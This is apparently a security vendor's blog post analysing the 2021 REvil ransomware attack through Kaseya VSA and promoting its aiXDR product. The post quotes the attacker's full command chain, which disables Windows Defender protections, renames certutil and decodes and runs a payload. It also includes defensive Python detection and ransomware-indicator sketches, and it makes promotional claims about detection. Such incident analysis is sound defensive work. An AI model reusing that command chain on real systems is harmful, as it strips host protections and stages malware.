How Seceon could have stopped the Ransomware roll over Kaseya

Attacks and attack methods keep changing, and the recent attack on Kaseya is a result of what the industry is still missing in terms of cybersecurity. The attack on Kaseya came into action a few days ago. It emerged suddenly and brutally, infecting around 1500 businesses worldwide, as per the statement by Kaseya's CEO. The names of the infected companies are not yet out. One observed result of this attack was the Swedish Coop supermarket chain, which was forced to close; it is among the clients of the MSPs that were hacked, and it got infected across 2100 endpoints.

A $70 million ransom was demanded in exchange for the data. The REvil ransomware gang is considered responsible for this operation. It is still a mystery whether REvil prepared this attack themselves or whether it came from one of their associates. Kaseya was forced to completely shut down its cloud infrastructure to stop the malicious updates from spreading, and it advised all customers to power down their servers, which created a lot of chaos.

What is VSA, how did it get compromised, and how did the ransomware roll over it?

VSA is a remote monitoring tool, a kind of remote access tool (RAT), that gives complete access to the system or device it is installed on, which helps IT technicians diagnose and fix problems remotely. Not every organization has the resources to manage its infrastructure in house, so they outsource this task to an MSP (Managed Service Provider). These MSPs often manage the systems of hundreds of companies simultaneously. Kaseya is a provider to MSPs, with VSA as its product; VSA has an on-premises version, which is run by the customer in their own environment. This is typically needed by MSPs to manage all their client systems, and this is what went wrong with the Kaseya server that was used to manage a lot of their clients. Having access to this server by itself allows access to all the clients associated with it, and this is how it was initially compromised. Soon after the attack rolled out, all VSA servers were advised to shut down.

The operation was huge enough to infect businesses at scale. It was mass ransomware, unlike the ransomware we usually know, where one organization gets infected, all of its systems get encrypted and it is asked for a ransom. Here the case was quite different: hundreds of organizations around the world got encrypted simultaneously by the same ransomware campaign, which was tunnelled through the software update mechanism of Kaseya, so from its inception it moved as a supply chain attack. It was a compromise of Kaseya operated through the VSA server, rather than directly through any directory, as we usually see in ransomware. The VSA server was used to ransomware a lot of organizations in a single click, and this is what happened at a high level.

How does it propagate? The scenario is this: if a device uses Kaseya's agent to monitor all the devices subject to a policy, and that agent is connected to a central server, and that server is affected, then every system connected to it is at higher risk. This is how it propagated as a chain attack, one after the other, and affected thousands of servers.
  • How did the initial compromise begin, and how would aiXDR have detected
    it?
  • As a VSA server vulnerability was exploited: Seceon aiXDR can detect and
    remediate exploited vulnerabilities and zero-day attacks at a very early
    stage. Here is the step-by-step analysis.
  • aiXDR monitors all inbound and outbound connections, and in this case
    aiXDR should have detected a connection from blacklisted IPs or from a
    prohibited country and automatically blocked that connection.
  • Once the connection was made, it was trying to download/upload agent.exe
    on the host. aiXDR can detect data exfiltration, and in this case aiXDR
    should have blocked that connection so it could not download agent.exe
    or transfer data to external hosts.
  • Also, once the host had agent.exe downloaded, it was running different
    types of scans to gain access to other hosts. aiXDR should have detected
    those scans and automatically quarantined that host so it could not
    infect other hosts.
  • The following command line, which invokes PowerShell, was launched by the
    C:\Program Files (x86)\Kaseya\<ID>\AgentMon.exe file of the Kaseya VSA
    platform (one command, broken here at its & separators for readability):

        C:\WINDOWS\system32\cmd.exe /c ping 127.0.0.1 -n 4979 > nul
        & C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Set-MpPreference
            -DisableRealtimeMonitoring $true -DisableIntrusionPreventionSystem $true
            -DisableIOAVProtection $true -DisableScriptScanning $true
            -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force
            -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
        & copy /Y C:\Windows\System32\certutil.exe C:\Windows\cert.exe
        & echo %RANDOM% >> C:\Windows\cert.exe
        & C:\Windows\cert.exe -decode c:\kworking\agent.crt c:\kworking\agent.exe
        & del /q /f c:\kworking\agent.crt C:\Windows\cert.exe
        & c:\kworking\agent.exe
  • As AgentMon.exe starts its first child process to execute this command,
    aiXDR would have detected a new process started by AgentMon.exe from
    C:\Program Files (x86)\Kaseya\.
  • aiXDR detects when any protection service is disabled on a host; as we
    can see in this case, they were trying to disable the protection
    services (the Set-MpPreference switches in the command above).
  • aiXDR detects when a process is renamed (masquerading); as we can see in
    this case, certutil.exe was renamed to cert.exe.
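As an added example (not Seceon code and not from the original presentation), the following Python sketch applies those three detections to constructed Sysmon-style process-creation events modelled on the command chain above. The event fields, the AB12 agent folder id, the rule names and the use of the PE OriginalFileName field for the masquerade check are all assumptions.

```python
import ntpath
import re

# Constructed Sysmon-style process-creation events modelled on the command chain
# quoted above (not real telemetry). "orig" stands for the PE OriginalFileName
# field, which survives a rename on disk. "AB12" is a made-up agent folder id.
EVENTS = [
    {"pid": 4100, "image": r"C:\Program Files (x86)\Kaseya\AB12\AgentMon.exe",
     "orig": "AgentMon.exe", "parent": r"C:\Windows\System32\services.exe",
     "cmd": "AgentMon.exe"},
    {"pid": 4112, "image": r"C:\WINDOWS\system32\cmd.exe", "orig": "Cmd.Exe",
     "parent": r"C:\Program Files (x86)\Kaseya\AB12\AgentMon.exe",
     "cmd": r"cmd.exe /c ping 127.0.0.1 -n 4979 > nul & powershell.exe "
            r"Set-MpPreference -DisableRealtimeMonitoring $true -MAPSReporting Disabled"},
    {"pid": 4120, "image": r"C:\Windows\cert.exe", "orig": "CertUtil.exe",
     "parent": r"C:\WINDOWS\system32\cmd.exe",
     "cmd": r"C:\Windows\cert.exe -decode c:\kworking\agent.crt c:\kworking\agent.exe"},
    {"pid": 4130, "image": r"C:\Windows\System32\notepad.exe", "orig": "NOTEPAD.EXE",
     "parent": r"C:\Windows\explorer.exe", "cmd": "notepad.exe"},
]

RMM_PARENTS = {"agentmon.exe"}            # the VSA agent binary named on the page
SHELLS = {"cmd.exe", "powershell.exe"}
# Any Set-MpPreference call that turns a Defender protection off or mutes reporting.
DEFENDER_TAMPER = re.compile(
    r"set-mppreference.*?(-disable\w+\s+\$?true|-mapsreporting\s+disabled"
    r"|-submitsamplesconsent\s+neversend|-enablecontrolledfolderaccess\s+disabled)",
    re.I)

def base(path: str) -> str:
    return ntpath.basename(path).lower()

def evaluate(event: dict) -> list:
    """Return the names of the rules this event trips (empty list = benign)."""
    hits = []
    img, parent, cmd = base(event["image"]), base(event["parent"]), event["cmd"]
    if parent in RMM_PARENTS and img in SHELLS:
        hits.append("rmm_agent_spawned_shell")          # AgentMon.exe -> cmd/powershell
    if DEFENDER_TAMPER.search(cmd):
        hits.append("defender_protection_disabled")     # protection service turned off
    if event["orig"].lower() != img:
        hits.append("masquerading_renamed_binary")      # e.g. certutil.exe as cert.exe
    if event["orig"].lower() == "certutil.exe" and "-decode" in cmd.lower():
        hits.append("certutil_decode_payload")          # agent.crt -> agent.exe
    return hits

def triage(events: list) -> dict:
    """pid -> tripped rules, for the events that tripped at least one."""
    return {e["pid"]: h for e in events if (h := evaluate(e))}
```

Running `triage(EVENTS)` flags only the cmd.exe child of AgentMon.exe and the renamed certutil, leaving the agent itself and notepad untouched.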

What was the impact of this? The threat actor was able to achieve code execution that enabled them to search the scripts linked with Kaseya's application and pull out certain procedures or agent updates. It is part of the application's functionality to push procedures out to all managed agents; these agents run on the computers managed by the solution. They simply ran the script against all managed clients, which triggered a file copy and script execution on all managed clients. This is how they ended up infecting all these systems. There were a couple of steps, initiated one after another, that made up a complete and successful attack attempt, but surprisingly none of them was looked at or detected in between.
  • Approach after being infected?
  • There are always different indicators left on a system that tell whether
    and how it has been compromised. In this case it was identified that
    logs had been cleared at multiple stages: the logs were gone, and other
    types of logs inside the application database itself were deleted, but
    some logs still remained showing what the VSA server had pushed out to
    manage clients. These logs became the starting point of the
    investigation into how the systems were targeted from the VSA server.
  • A few indications of being hit by ransomware
  • Ransomware is emerging as a complete business model, and the threat
    actors are making a lot of money out of it. Below are a few indications:
  • All files on the system get encrypted, and a README file is left behind
    stating the ransom amount. The file extension changes, which is a clear
    indication that an attack has occurred.
  • Some files may or may not get encrypted; this happens when the
    ransomware did not execute successfully, i.e. it executed only
    partially.
  • Preliminary execution that disables antivirus functionality such as
    Windows Defender or other security layers.
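An added illustration, not from the original presentation: a Python scan that checks a directory tree for the indicators listed above (a ransom note, many files renamed to one new extension, high-entropy contents) and separates a partial run from a full one. The 7.5 bits-per-byte cut-off, the constructed victim tree and the made-up .abc12 extension are assumptions.

```python
import math
import os
import random
import tempfile
from collections import Counter

def shannon_entropy(data: bytes) -> float:
    """Bits per byte; encrypted or compressed content sits close to 8.0."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())

def assess(root: str) -> dict:
    """Walk a tree for the indicators listed above: ransom notes, many files
    sharing one new extension, and high-entropy (encrypted) contents. The share
    of encrypted files separates a full run from a partial one."""
    notes, exts, encrypted, total = 0, Counter(), 0, 0
    for dirpath, _, names in os.walk(root):
        for name in names:
            with open(os.path.join(dirpath, name), "rb") as f:
                head = f.read(4096)
            if "readme" in name.lower() and b"decrypt" in head.lower():
                notes += 1                    # ransom note, not a victim file
                continue
            total += 1
            exts[os.path.splitext(name)[1].lower()] += 1
            encrypted += shannon_entropy(head) > 7.5   # 7.5 is an assumed cut-off
    share = encrypted / total if total else 0.0
    verdict = "clean" if share == 0 else "partial" if share < 0.9 else "full"
    return {"notes": notes, "dominant_ext": exts.most_common(1)[0][0] if exts else "",
            "encrypted_share": round(share, 2), "verdict": verdict}

def build_sample() -> str:
    """Constructed victim tree (not real data): six spreadsheets 'encrypted' to a
    made-up .abc12 extension, two untouched memos and one ransom note."""
    root = tempfile.mkdtemp()
    rng = random.Random(7)                   # deterministic stand-in for ciphertext
    for i in range(6):
        with open(os.path.join(root, f"report{i}.xlsx.abc12"), "wb") as f:
            f.write(bytes(rng.getrandbits(8) for _ in range(4096)))
    for i in range(2):
        with open(os.path.join(root, f"memo{i}.docx"), "wb") as f:
            f.write(b"Quarterly figures for the board. " * 120)
    with open(os.path.join(root, "abc12-readme.txt"), "wb") as f:
        f.write(b"Your files are encrypted. Pay to decrypt them.")
    return root
```

`assess(build_sample())` reports one note, `.abc12` as the dominant extension and an encrypted share of 0.75, which the verdict classifies as a partial run.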

Brief About Seceon aiXDR
Seceon aiXDR is highly effective, enriched with machine learning, AI, big data, dynamic threat intelligence, strong correlation and in-depth analysis, which allows it to cut the threat off at its roots at a very early stage. The solution detects the threat origin, whether it is coming from the network, an application, a host or a machine. One of its most interesting features is to show anything and everything that was done to make the attack attempt, and how the Seceon solution stopped it midway to keep the environment secure with 360-degree comprehensive visibility, proactive threat detection, and auto-stopping of threats and breaches in real time. Customers should always make sure that they are not just taking a solution that is problem specific; the solution should always be capable of protecting the environment from all kinds of threats and malicious activity, whether known or unknown. Seceon aiXDR is a single all-in-one platform that helps eliminate silo-based solutions and delivers the essential results effectively and comprehensively.

Diagram: the Seceon aiXDR approach (continuous real-time monitoring, proactive detection, auto-stop of threats and breaches, best cybersecurity ROI).
Contact Us
Address: 238 Littleton Road, Suite 206, Westford, MA 01886, USA
Phone Number: 1 (978)-923-0040
Email: sales@seceon.com, info@seceon.com
Website: https://www.seceon.com/
Twitter: https://twitter.com/Seceon_Inc